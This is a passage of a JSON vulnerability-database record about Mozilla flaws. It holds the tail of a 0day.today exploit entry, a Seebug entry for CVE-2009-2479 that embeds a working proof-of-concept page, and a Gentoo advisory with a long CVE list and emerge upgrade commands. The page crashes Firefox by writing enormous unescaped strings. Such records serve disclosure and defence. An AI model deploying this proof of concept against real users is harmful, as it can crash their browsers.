(xi=1;xi<searchArray.length;xi++)\r\n {\r\n xhtml += escapeData(searchArray[xi][\"dac\"]);\r\n }\r\n}\r\n \r\nsetInterval(\"fill_function()\", .5);\r\n \r\n</script>\r\n</body>\r\n</html>\n\n# 0day.today [2018-04-06] #", "sourceHref": "https://0day.today/exploit/26548", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T18:57:47", "description": "Bugraq ID: 35707\r\nCVE ID\uff1aCVE-2009-2479\r\nCNCVE ID\uff1aCNCVE-20092479\r\n\r\nMozilla Firefox\u662f\u4e00\u6b3e\u5f00\u653e\u6e90\u4ee3\u7801\u7684WEB\u6d4f\u89c8\u5668\u3002\r\nMozilla Firefox\u5904\u7406unicode\u6570\u636e\u5b58\u5728\u95ee\u9898\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u4f7f\u5e94\u7528\u7a0b\u5e8f\u5d29\u6e83\u3002\r\n\u6784\u5efa\u6076\u610fWEB\u9875\uff0c\u8bf1\u4f7f\u7528\u6237\u6253\u5f00\u53ef\u89e6\u53d1\u6b64\u6f0f\u6d1e\u3002\n\nMozilla Firefox 3.5.1\r\nMozilla Firefox 3.5\r\nMozilla Firefox 3.0.11\r\nMozilla Firefox 3.0.10\r\nMozilla Firefox 3.0.9\r\nMozilla Firefox 3.0.8\r\nMozilla Firefox 3.0.7\r\nMozilla Firefox 3.0.6\r\nMozilla Firefox 3.0.5\r\nMozilla Firefox 3.0.4\r\nMozilla Firefox 3.0.3\r\nMozilla Firefox 3.0.2\r\nMozilla Firefox 3.0.1\r\nMozilla Firefox 3.0\n\u76ee\u524d\u6ca1\u6709\u89e3\u51b3\u65b9\u6848\u63d0\u4f9b\uff1a\r\nhttp://www.mozilla.com/en-US/", "published": "2009-07-21T00:00:00", "title": "Mozilla Firefox Unicode\u6570\u636e\u8fdc\u7a0b\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2479"], "modified": "2009-07-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11848", "id": "SSV:11848", "sourceData": "\n <html>\r\n<head>\r\n<script language="JavaScript" type="Text/Javascript">\r\n var str = unescape("%u4141%u4141");\r\n var str2 = unescape("%u0000%u0000");\r\n var finalstr2 = mul8(str2, 49000000);\r\n var finalstr = mul8(str, 21000000);\r\ndocument.write(finalstr2);\r\ndocument.write(finalstr);\r\nfunction mul8 (str, num) {\r\n var i = Math.ceil(Math.log(num) / Math.LN2),\r\n res = str;\r\n do {\r\n res += res;\r\n } while (0 < --i);\r\n return res.slice(0, str.length * num);\r\n}\r\n</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n<html><body></body></html>\n ", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-11848"}], "gentoo": [{"lastseen": "2016-09-06T19:46:13", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1945", "CVE-2011-3648", "CVE-2009-0355", "CVE-2011-0061", "CVE-2011-0077", "CVE-2012-0478", "CVE-2012-4193", "CVE-2011-1202", "CVE-2012-0442", "CVE-2010-3772", "CVE-2011-0071", "CVE-2009-2470", "CVE-2010-0654", "CVE-2009-3388", "CVE-2012-1962", "CVE-2012-0443", "CVE-2011-3866", "CVE-2011-0068", "CVE-2012-5842", "CVE-2012-4212", "CVE-2009-2477", "CVE-2009-1563", "CVE-2010-0176", "CVE-2011-3640", "CVE-2011-0083", "CVE-2010-1203", "CVE-2009-3076", "CVE-2012-1970", "CVE-2009-3389", "CVE-2008-3835", "CVE-2012-3989", "CVE-2010-2762", "CVE-2012-5830", "CVE-2012-4210", "CVE-2009-1305", "CVE-2011-3026", "CVE-2009-3979", "CVE-2011-2370", "CVE-2012-0460", "CVE-2012-1973", "CVE-2009-3376", "CVE-2011-2369", "CVE-2011-2998", "CVE-2011-3654", "CVE-2011-2605", "CVE-2009-1833", "CVE-2010-0165", "CVE-2012-1974", "CVE-2010-0220", "CVE-2010-2766", "CVE-2011-2993", "CVE-2012-4195", "CVE-2010-0168", "CVE-2012-3986", "CVE-2010-0160", "CVE-2009-1169", "CVE-2011-2371", "CVE-2009-3379", "CVE-2012-4185", "CVE-2010-3777", "CVE-2012-3991", "CVE-2012-5354", "CVE-2012-4206", "CVE-2009-3071", "CVE-2012-3968", "CVE-2010-1214", "CVE-2012-3963", "CVE-2010-0174", "CVE-2010-0172", "CVE-2009-2535", "CVE-2012-0452", "CVE-2009-1312", "CVE-2012-1956", "CVE-2012-3978", "CVE-2012-3985", "CVE-2011-2995", "CVE-2012-5829", "CVE-2009-1571", "CVE-2008-5505", "CVE-2012-5838", "CVE-2011-2986", "CVE-2010-1205", "CVE-2009-2210", "CVE-2009-2478", "CVE-2008-6961", "CVE-2012-0479", "CVE-2012-0450", "CVE-2012-1940", "CVE-2012-3993", "CVE-2008-5500", "CVE-2012-5836", "CVE-2009-3274", "CVE-2010-1125", "CVE-2009-0772", "CVE-2012-3995", "CVE-2012-4201", "CVE-2010-0159", "CVE-2009-0773", "CVE-2011-3659", "CVE-2011-3663", "CVE-2010-3131", "CVE-2012-0470", "CVE-2012-0446", "CVE-2008-4063", "CVE-2012-3976", "CVE-2012-1972", "CVE-2010-1200", "CVE-2010-0175", "CVE-2010-0170", "CVE-2012-3988", "CVE-2012-0457", "CVE-2010-3778", "CVE-2012-3994", "CVE-2007-2436", "CVE-2012-3962", "CVE-2010-2770", "CVE-2010-3774", "CVE-2012-0459", "CVE-2011-2362", "CVE-2009-1304", "CVE-2010-1213", "CVE-2010-3177", "CVE-2012-5843", "CVE-2009-1835", "CVE-2011-0085", "CVE-2009-0352", "CVE-2009-3984", "CVE-2009-3380", "CVE-2008-5510", "CVE-2011-0080", "CVE-2012-1950", "CVE-2008-5502", "CVE-2009-3981", "CVE-2010-3765", "CVE-2010-0167", "CVE-2009-3373", "CVE-2009-3980", "CVE-2008-4070", "CVE-2012-4183", "CVE-2010-3178", "CVE-2012-1994", "CVE-2011-3661", "CVE-2009-3383", "CVE-2012-4181", "CVE-2011-3652", "CVE-2009-1311", "CVE-2011-1712", "CVE-2008-4067", "CVE-2010-1210", "CVE-2011-2364", "CVE-2009-2469", "CVE-2011-0073", "CVE-2010-1197", "CVE-2010-1207", "CVE-2009-0652", "CVE-2012-4186", "CVE-2012-1948", "CVE-2008-5012", "CVE-2011-2982", "CVE-2012-1938", "CVE-2012-0449", "CVE-2010-3769", "CVE-2012-3969", "CVE-2009-1838", "CVE-2012-1953", "CVE-2008-5013", "CVE-2012-1949", "CVE-2012-0456", "CVE-2011-2372", "CVE-2010-3773", "CVE-2009-1309", "CVE-2011-0079", "CVE-2010-3169", "CVE-2009-2662", "CVE-2012-3970", "CVE-2011-2997", "CVE-2011-0053", "CVE-2009-1832", "CVE-2012-5840", "CVE-2010-3176", "CVE-2012-4191", "CVE-2010-3174", "CVE-2012-1966", "CVE-2010-3768", "CVE-2009-3372", "CVE-2010-2763", "CVE-2011-0066", "CVE-2010-1212", "CVE-2009-1837", "CVE-2010-1206", "CVE-2010-1211", "CVE-2009-2464", "CVE-2011-2990", "CVE-2010-1121", "CVE-2009-0356", "CVE-2011-3389", "CVE-2010-0164", "CVE-2008-3836", "CVE-2010-3167", "CVE-2012-4202", "CVE-2007-2671", "CVE-2011-2984", "CVE-2010-3180", "CVE-2012-3957", "CVE-2011-3660", "CVE-2009-3986", "CVE-2012-1941", "CVE-2009-2408", "CVE-2010-3399", "CVE-2009-2665", "CVE-2008-4066", "CVE-2008-5018", "CVE-2009-3978", "CVE-2012-3984", "CVE-2009-0354", "CVE-2009-3079", "CVE-2011-0056", "CVE-2012-0444", "CVE-2011-3650", "CVE-2010-2753", "CVE-2012-1946", "CVE-2010-3776", "CVE-2010-1215", "CVE-2012-4182", "CVE-2011-2980", "CVE-2012-4187", "CVE-2008-4069", "CVE-2010-0166", "CVE-2011-3647", "CVE-2011-0065", "CVE-2011-0062", "CVE-2008-0016", "CVE-2009-0358", "CVE-2011-3101", "CVE-2010-3168", "CVE-2010-0173", "CVE-2009-1044", "CVE-2008-5513", "CVE-2008-4059", "CVE-2010-2764", "CVE-2011-0081", "CVE-2009-0771", "CVE-2009-1392", "CVE-2008-5504", "CVE-2008-5019", "CVE-2012-1954", "CVE-2009-0774", "CVE-2009-3375", "CVE-2012-0461", "CVE-2011-2376", "CVE-2009-2472", "CVE-2012-3958", "CVE-2009-0071", "CVE-2008-5023", "CVE-2012-0469", "CVE-2010-3171", "CVE-2009-3072", "CVE-2012-3973", "CVE-2008-5822", "CVE-2012-1975", "CVE-2011-0075", "CVE-2012-0464", "CVE-2012-1967", "CVE-2011-3653", "CVE-2010-0648", "CVE-2010-0178", "CVE-2010-3166", "CVE-2010-0177", "CVE-2011-0074", "CVE-2012-3956", "CVE-2010-2769", "CVE-2011-3649", "CVE-2012-3982", "CVE-2009-3555", "CVE-2011-2989", "CVE-2010-1196", "CVE-2008-3837", "CVE-2009-0357", "CVE-2008-5021", "CVE-2008-5017", "CVE-2012-3966", "CVE-2012-5839", "CVE-2011-2378", "CVE-2009-1308", "CVE-2010-3775", "CVE-2009-2467", "CVE-2012-1961", "CVE-2010-5074", "CVE-2011-2996", "CVE-2010-3173", "CVE-2012-4216", "CVE-2008-4062", "CVE-2010-3179", "CVE-2010-0182", "CVE-2012-3967", "CVE-2011-3651", "CVE-2008-4060", "CVE-2010-0181", "CVE-2012-1951", "CVE-2012-0475", "CVE-2012-3965", "CVE-2012-1952", "CVE-2010-1201", "CVE-2011-4688", "CVE-2009-1306", "CVE-2010-1585", "CVE-2009-2479", "CVE-2012-3959", "CVE-2012-0455", "CVE-2009-0777", "CVE-2010-2755", "CVE-2011-0084", "CVE-2011-0051", "CVE-2010-3767", "CVE-2012-1939", "CVE-2009-1834", "CVE-2010-3771", "CVE-2010-0183", "CVE-2012-0474", "CVE-2012-3975", "CVE-2010-2768", "CVE-2008-5014", "CVE-2008-0367", "CVE-2008-4058", "CVE-2011-3002", "CVE-2012-4184", "CVE-2011-0057", "CVE-2012-0447", "CVE-2011-3232", "CVE-2008-5913", "CVE-2007-3073", "CVE-2012-4205", "CVE-2010-2751", "CVE-2009-1836", "CVE-2011-0069", "CVE-2008-5022", "CVE-2008-5512", "CVE-2012-3992", "CVE-2009-3374", "CVE-2008-5501", "CVE-2008-4068", "CVE-2008-5016", "CVE-2011-3004", "CVE-2012-3980", "CVE-2008-5503", "CVE-2011-2374", "CVE-2012-1955", "CVE-2009-1839", "CVE-2012-1960", "CVE-2012-0445", "CVE-2009-3074", "CVE-2012-1965", "CVE-2011-3670", "CVE-2012-0462", "CVE-2010-1028", "CVE-2010-0162", "CVE-2011-2377", "CVE-2009-2463", "CVE-2009-2061", "CVE-2009-3070", "CVE-2012-3977", "CVE-2011-3000", "CVE-2010-2765", "CVE-2009-3069", "CVE-2010-0171", "CVE-2010-2767", "CVE-2009-0353", "CVE-2011-0078", "CVE-2012-3960", "CVE-2010-3175", "CVE-2009-0775", "CVE-2012-0451", "CVE-2011-3655", "CVE-2012-4180", "CVE-2009-2044", "CVE-2010-3182", "CVE-2009-0776", "CVE-2009-3371", "CVE-2009-3377", "CVE-2012-1959", "CVE-2011-2363", "CVE-2009-3075", "CVE-2010-0163", "CVE-2010-1208", "CVE-2011-0070", "CVE-2012-1947", "CVE-2009-1841", "CVE-2010-3170", "CVE-2011-3005", "CVE-2011-0059", "CVE-2012-1971", "CVE-2009-3983", "CVE-2012-4208", "CVE-2009-3987", "CVE-2011-3658", "CVE-2011-2373", "CVE-2008-5511", "CVE-2012-1957", "CVE-2012-1958", "CVE-2011-0054", "CVE-2012-4190", "CVE-2008-4064", "CVE-2012-1976", "CVE-2011-1187", "CVE-2012-5835", "CVE-2010-3183", "CVE-2009-2654", "CVE-2010-1202", "CVE-2012-0468", "CVE-2009-3982", "CVE-2009-3985", "CVE-2009-2065", "CVE-2009-1313", "CVE-2009-3382", "CVE-2008-5508", "CVE-2012-3972", "CVE-2012-4207", "CVE-2011-2988", "CVE-2010-3770", "CVE-2008-4061", "CVE-2010-1199", "CVE-2012-4204", "CVE-2008-0017", "CVE-2009-3988", "CVE-2010-3400", "CVE-2009-1302", "CVE-2011-2985", "CVE-2009-2466", "CVE-2012-4192", "CVE-2011-0058", "CVE-2011-2987", "CVE-2012-4188", "CVE-2012-0441", "CVE-2008-5024", "CVE-2011-0076", "CVE-2007-2437", "CVE-2012-5833", "CVE-2011-2999", "CVE-2012-3964", "CVE-2012-5841", "CVE-2010-0179", "CVE-2010-1209", "CVE-2010-2754", "CVE-2008-5507", "CVE-2009-2471", "CVE-2012-3990", "CVE-2011-2375", "CVE-2010-1198", "CVE-2008-4065", "CVE-2009-1840", "CVE-2011-3665", "CVE-2009-3381", "CVE-2011-0067", "CVE-2010-2760", "CVE-2012-1937", "CVE-2012-4215", "CVE-2009-2043", "CVE-2009-1307", "CVE-2009-2664", "CVE-2012-0463", "CVE-2010-4508", "CVE-2009-1310", "CVE-2009-3077", "CVE-2011-3003", "CVE-2011-2991", "CVE-2008-5015", "CVE-2011-0082", "CVE-2011-2983", "CVE-2012-4179", "CVE-2008-4582", "CVE-2011-3001", "CVE-2012-1964", "CVE-2009-2462", "CVE-2009-3378", "CVE-2011-3062", "CVE-2009-1303", "CVE-2012-0477", "CVE-2012-0473", "CVE-2012-4194", "CVE-2011-2365", "CVE-2012-4209", "CVE-2012-1963", "CVE-2012-4196", "CVE-2008-5506", "CVE-2009-2404", "CVE-2009-2465", "CVE-2012-0467", "CVE-2011-2981", "CVE-2012-0458", "CVE-2010-0169", "CVE-2010-2752", "CVE-2009-3078", "CVE-2012-0471", "CVE-2012-3961", "CVE-2010-3766", "CVE-2012-3971", "CVE-2008-5052", "CVE-2011-0055", "CVE-2009-1828", "CVE-2011-0072"], "description": "### Background\n\nMozilla Firefox is an open-source web browser and Mozilla Thunderbird an open-source email client, both from the Mozilla Project. The SeaMonkey project is a community effort to deliver production-quality releases of code derived from the application formerly known as the \u2018Mozilla Application Suite\u2019. XULRunner is a Mozilla runtime package that can be used to bootstrap XUL+XPCOM applications such as Firefox and Thunderbird. NSS is Mozilla\u2019s Network Security Services library that implements PKI support. IceCat is the GNU version of Firefox. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Mozilla Firefox, Thunderbird, SeaMonkey, NSS, GNU IceCat, and XULRunner. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could entice a user to view a specially crafted web page or email, possibly resulting in execution of arbitrary code or a Denial of Service condition. Furthermore, a remote attacker may be able to perform Man-in-the-Middle attacks, obtain sensitive information, bypass restrictions and protection mechanisms, force file downloads, conduct XML injection attacks, conduct XSS attacks, bypass the Same Origin Policy, spoof URL\u2019s for phishing attacks, trigger a vertical scroll, spoof the location bar, spoof an SSL indicator, modify the browser\u2019s font, conduct clickjacking attacks, or have other unspecified impact. \n\nA local attacker could gain escalated privileges, obtain sensitive information, or replace an arbitrary downloaded file. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Mozilla Firefox users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/firefox-10.0.11\"\n \n\nAll users of the Mozilla Firefox binary package should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/firefox-bin-10.0.11\"\n \n\nAll Mozilla Thunderbird users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-client/thunderbird-10.0.11\"\n \n\nAll users of the Mozilla Thunderbird binary package should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=mail-client/thunderbird-bin-10.0.11\"\n \n\nAll Mozilla SeaMonkey users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/seamonkey-2.14-r1\"\n \n\nAll users of the Mozilla SeaMonkey binary package should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/seamonkey-bin-2.14\"\n \n\nAll NSS users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-libs/nss-3.14\"\n \n\nThe \u201cwww-client/mozilla-firefox\u201d package has been merged into the \u201cwww-client/firefox\u201d package. To upgrade, please unmerge \u201cwww-client/mozilla-firefox\u201d and then emerge the latest \u201cwww-client/firefox\u201d package: \n \n \n # emerge --sync\n # emerge --unmerge \"www-client/mozilla-firefox\"\n # emerge --ask --oneshot --verbose \">=www-client/firefox-10.0.11\"\n \n\nThe \u201cwww-client/mozilla-firefox-bin\u201d package has been merged into the \u201cwww-client/firefox-bin\u201d package. To upgrade, please unmerge \u201cwww-client/mozilla-firefox-bin\u201d and then emerge the latest \u201cwww-client/firefox-bin\u201d package: \n \n \n # emerge --sync\n # emerge --unmerge \"www-client/mozilla-firefox-bin\"\n # emerge --ask --oneshot --verbose \">=www-client/firefox-bin-10.0.11\"\n \n\nThe \u201cmail-client/mozilla-thunderbird\u201d package has been merged into the \u201cmail-client/thunderbird\u201d package. To upgrade, please unmerge \u201cmail-client/mozilla-thunderbird\u201d and then emerge the latest \u201cmail-client/thunderbird\u201d package: \n \n \n # emerge --sync\n # emerge --unmerge \"mail-client/mozilla-thunderbird\"\n # emerge --ask --oneshot --verbose \">=mail-client/thunderbird-10.0.11\"\n \n\nThe \u201cmail-client/mozilla-thunderbird-bin\u201d package has been merged into the \u201cmail-client/thunderbird-bin\u201d package. To upgrade, please unmerge \u201cmail-client/mozilla-thunderbird-bin\u201d and then emerge the latest \u201cmail-client/thunderbird-bin\u201d package: \n \n \n # emerge --sync\n # emerge --unmerge \"mail-client/mozilla-thunderbird-bin\"\n # emerge --ask --oneshot --verbose\n \">=mail-client/thunderbird-bin-10.0.11\"\n \n\nGentoo discontinued support for GNU IceCat. We recommend that users unmerge GNU IceCat: \n \n \n # emerge --unmerge \"www-client/icecat\"\n \n\nGentoo discontinued support for XULRunner. We recommend that users unmerge XULRunner: \n \n \n # emerge --unmerge \"net-libs/xulrunner\"\n \n\nGentoo discontinued support for the XULRunner binary package. We recommend that users unmerge XULRunner: \n \n \n # emerge --unmerge \"net-libs/xulrunner-bin\"", "edition": 1, "modified": "2013-01-08T00:00:00", "published": "2013-01-08T00:00:00", "id": "GLSA-201301-01", "href": "https://security.gentoo.org/glsa/201301-01", "type": "gentoo", "title": "Mozilla Products: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
